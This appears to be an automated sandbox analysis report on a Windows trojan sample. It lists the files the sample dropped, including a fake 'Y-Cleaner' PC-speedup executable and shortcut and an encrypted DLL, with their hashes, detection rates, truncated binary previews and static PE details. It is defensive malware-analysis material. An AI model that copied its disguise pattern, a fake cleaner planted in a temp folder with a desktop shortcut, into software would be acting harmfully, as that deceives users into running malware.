                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.5.2.<./.P.i.

                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF8.tmp.xml

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4854
                                                            Entropy (8bit):4.604435780971445
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsbJg77aI9AMSWpW8VYzYm8M4Jmf/yFF+q8njkFjyIOIAd:uIjf1I7mC7V3J1hVFhAd
                                                            MD5:E5C44750A6479C14B69F609B9B1CACF0
                                                            SHA1:113FF90F0013631A12A7A6E4DEB46CC15B34CF90
                                                            SHA-256:E030FA68E00493F0F1A58777B82B7EA2B24FCBD9642F172CA59DE5237047F73D
                                                            SHA-512:B4AEF40FAA670B14B16A12EB6B707D01E7B8579F004DB54A027441F62E5169306AD5E097A202EB6BD46F02432CD34D1FAD964090079D23CFD30D44AE43C72DC2
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534191" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\download[1].htm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\name[1].htm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):7
                                                            Entropy (8bit):2.2359263506290326
                                                            Encrypted:false
                                                            SSDEEP:3:xIAn:z
                                                            MD5:8FA007FA30513F97141DA3E39B658159
                                                            SHA1:AA260A3AF3BB77E2A07056AFE79F3E2B88DB7257
                                                            SHA-256:3279465B2D2603BE30735D69F5439CF95136E4725A85DC0B2EA09DB0E57B092F
                                                            SHA-512:B2AF43AF1D4AC0DF6AE71895C9BFFC5E5FDC114F385C38F76CCF79EA8796A0CDFC6B5DAA92EE1CA347A7282A7B0FC6E89863E9CF30891FBF151B88FB1E668E1F
                                                            Malicious:false
                                                            Preview:mixnine

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\key[1].htm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):21
                                                            Entropy (8bit):3.880179922675737
                                                            Encrypted:false
                                                            SSDEEP:3:gFsR0GOWW:gyRhI
                                                            MD5:408E94319D97609B8E768415873D5A14
                                                            SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                            SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                            SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                            Malicious:false
                                                            Preview:9tKiK3bsYm4fMuK47Pk3s

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1502720
                                                            Entropy (8bit):7.646111739368707
                                                            Encrypted:false
                                                            SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                            MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                            SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                            SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                            SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                            • Antivirus: Virustotal, Detection: 60%, Browse
                                                            Joe Sandbox View:
                                                            • Filename: nRGKqzVQRt.exe, Detection: malicious, Browse
                                                            • Filename: BDY5OFXpM9.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: univ.exe, Detection: malicious, Browse
                                                            • Filename: univ.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: CSBls4grBI.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\fuckingdllENCR[1].dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):97296
                                                            Entropy (8bit):7.9982317718947025
                                                            Encrypted:true
                                                            SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                            MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                            SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                            SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                            SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                            Malicious:false
                                                            Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\add[1].htm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):242176
                                                            Entropy (8bit):6.47050397947197
                                                            Encrypted:false
                                                            SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                            MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                            SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                            SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                            SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 1%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: nRGKqzVQRt.exe, Detection: malicious, Browse
                                                            • Filename: BDY5OFXpM9.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: univ.exe, Detection: malicious, Browse
                                                            • Filename: univ.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: CSBls4grBI.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Win32.CrypterX-gen.27154.11356.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\download[1].htm

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:very short file (no magic)
                                                            Category:dropped
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3:V:V
                                                            MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                            SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                            SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                            SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                            Malicious:false
                                                            Preview:0

                                                            C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Bunifu_UI_v1.5.3.dll

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):242176
                                                            Entropy (8bit):6.47050397947197
                                                            Encrypted:false
                                                            SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                            MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                            SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                            SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                            SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Virustotal, Detection: 1%, Browse
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                            C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1502720
                                                            Entropy (8bit):7.646111739368707
                                                            Encrypted:false
                                                            SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                            MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                            SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                            SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                            SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 75%
                                                            • Antivirus: Virustotal, Detection: 60%, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                            C:\Users\user\Desktop\Cleaner.lnk

                                                            Download File
                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Tue Oct 8 07:08:44 2024, mtime=Tue Oct 8 07:08:44 2024, atime=Tue Oct 8 07:08:44 2024, length=1502720, window=hide
                                                            Category:dropped
                                                            Size (bytes):2219
                                                            Entropy (8bit):3.880219765819078
                                                            Encrypted:false
                                                            SSDEEP:48:8pBi8OCnonR5AqXkQKnZgvN0LkQd9LkQFZGqLkQQyF:8pBNHnoR5DXjjN4jDjfjQy
                                                            MD5:669074E612D838379543025791588C5F
                                                            SHA1:9B8FF668CC2941E661F5917DD4303EC2AA0BB1F2
                                                            SHA-256:70EAEE7FED77FE4E01714228FF9C0C3F51470077C6150804727F7072B25D118E
                                                            SHA-512:E50158B02E62B057849FAFE48E60317F136F33542D990BAC422F710347C9216F4065F6D9C7B844DEBF0BCE8DF6BBFB7DB00CB590AFD273345D3C5BDD24294988
                                                            Malicious:false
                                                            Preview:L..................F.@.. ....@ZKY....@ZKY....@ZKY...........................B.:..DG..Yr?.D..U..k0.&...&......vk.v......\+Y...+.cKY.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^HY.@...........................%..A.p.p.D.a.t.a...B.P.1.....HY.@..Local.<......CW.^HY.@....b.....................S..L.o.c.a.l.....N.1.....HY.@..Temp..:......CW.^HY.@....l.....................b.K.T.e.m.p.....~.1.....HY.A..WWSEFY~1..f......HY.AHY.A...._.........................W.w.s.e.f.Y.v.R.A.z.Y.Z.N.1.v.3.f.r.K.w.F.A.1.w.F.8.....h.2.....HY.A .Y-CLEA~1.EXE..L......HY.AHY.A..........................Y...Y.-.C.l.e.a.n.e.r...e.x.e.......y...............-.......x............'......C:\Users\user\AppData\Local\Temp\WwsefYvRAzYZN1v3frKwFA1wF8\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.>.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.W.w.s.e.f.Y.v.R.A.z.Y.Z.N.1.v.3.f.r.K.w.F.A.1.w.F.8.\.Y.-.C.l.e.a.n.e.r...e.x.e.J.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l

                                                            C:\Windows\appcompat\Programs\Amcache.hve

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:MS Windows registry file, NT/2000 or above
                                                            Category:dropped
                                                            Size (bytes):1835008
                                                            Entropy (8bit):4.465761680829982
                                                            Encrypted:false
                                                            SSDEEP:6144:WIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN+dwBCswSbpx:bXD94+WlLZMM6YFH4+p
                                                            MD5:7DA52C5AE8EBF3FFF0DD0335C2F920AE
                                                            SHA1:8326D34BD9556F2E1F4296FCC185C06DBF733EFE
                                                            SHA-256:5C39B7399CF59850EFCC673AA6E89C39AF24D4A148FE1DAEC3099ECADE4A5F5B
                                                            SHA-512:81E2B796234DD1AC86955455D8F21E952C7616B865AD37784A0C3D94FA21CDE9C34ED6C7E0C36AB8AD1A28E7114C494DA2E95F42DD904E80640F85EAA3142CDD
                                                            Malicious:false
                                                            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm&..3Y................................................................................................................................................................................................................................................................................................................................................V..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):7.155292231265221
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                            File size:307'200 bytes
                                                            MD5:b1281430b4f8c39015940b1e5dc9d569
                                                            SHA1:58ba4506cdb786fc0b15d4717535e6463206f975
                                                            SHA256:dd8bd13e56f2c3c3b60e1c009caf5a3a66dce4eb59f32c4383a71a876dc0cb5a
                                                            SHA512:0ca0e1543617d95a0263e1c205f6bea8139db333ba7028ccd8fd50459576966f7cb5be83a336f90b381c0cee39f5bec7f4031aa3ae48438c018311c584552a91
                                                            SSDEEP:6144:B9Le1JnmHkXBRPuk1xaMGyws/IHQgoBzD3ZBzD:fC1JnAkXBBuKxaMGyw1wpXnX
                                                            TLSH:A064C02171F79D16F7F349720678A2D03A3BFA676A31C05E2140FB8F5D7A2918A61B13
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@.....................................h......................................Rich............PE..L....5.e...................

                                                            File Icon

                                                            Icon Hash:c7a99a8a8651790c

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x401667
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x65C835C8 [Sun Feb 11 02:49:44 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:fbc3e75f2d9f9185d8f077824c0d6c28

                                                            Entrypoint Preview

                                                            Instruction
                                                            call 00007F152450C184h
                                                            jmp 00007F152450958Eh
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 00000328h
                                                            mov dword ptr [0042E3C8h], eax
                                                            mov dword ptr [0042E3C4h], ecx
                                                            mov dword ptr [0042E3C0h], edx
                                                            mov dword ptr [0042E3BCh], ebx
                                                            mov dword ptr [0042E3B8h], esi
                                                            mov dword ptr [0042E3B4h], edi
                                                            mov word ptr [0042E3E0h], ss
                                                            mov word ptr [0042E3D4h], cs
                                                            mov word ptr [0042E3B0h], ds
                                                            mov word ptr [0042E3ACh], es
                                                            mov word ptr [0042E3A8h], fs
                                                            mov word ptr [0042E3A4h], gs
                                                            pushfd
                                                            pop dword ptr [0042E3D8h]
                                                            mov eax, dword ptr [ebp+00h]
                                                            mov dword ptr [0042E3CCh], eax
                                                            mov eax, dword ptr [ebp+04h]
                                                            mov dword ptr [0042E3D0h], eax
                                                            lea eax, dword ptr [ebp+08h]
                                                            mov dword ptr [0042E3DCh], eax
                                                            mov eax, dword ptr [ebp-00000320h]
                                                            mov dword ptr [0042E318h], 00010001h
                                                            mov eax, dword ptr [0042E3D0h]
                                                            mov dword ptr [0042E2CCh], eax
                                                            mov dword ptr [0042E2C0h], C0000409h
                                                            mov dword ptr [0042E2C4h], 00000001h
                                                            mov eax, dword ptr [0042D008h]
                                                            mov dword ptr [ebp-00000328h], eax
                                                            mov eax, dword ptr [0042D00Ch]
                                                            mov dword ptr [ebp-00000324h], eax
                                                            call dword ptr [000000CCh]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [C++] VS2008 build 21022
                                                            • [ASM] VS2008 build 21022
                                                            • [ C ] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [RES] VS2008 build 21022
                                                            • [LNK] VS2008 build 21022

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x2c6c40x3c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x10b0000x1d348.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x2c3f80x18.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c3b00x40.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x184.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x2969f0x29800bceac93c4383f3ad93868796229e2ac0False0.9116034450301205data7.8387433799683475IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x2b0000x1fa00x20000539a36248b9ffd558685ef0e7254109False0.368408203125data5.57966054423769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x2d0000xda67c0x1400b0002943268b08943d1ebe30ef299a8dFalse0.16875data1.8255554986568536IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .hum0x1080000x7c0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
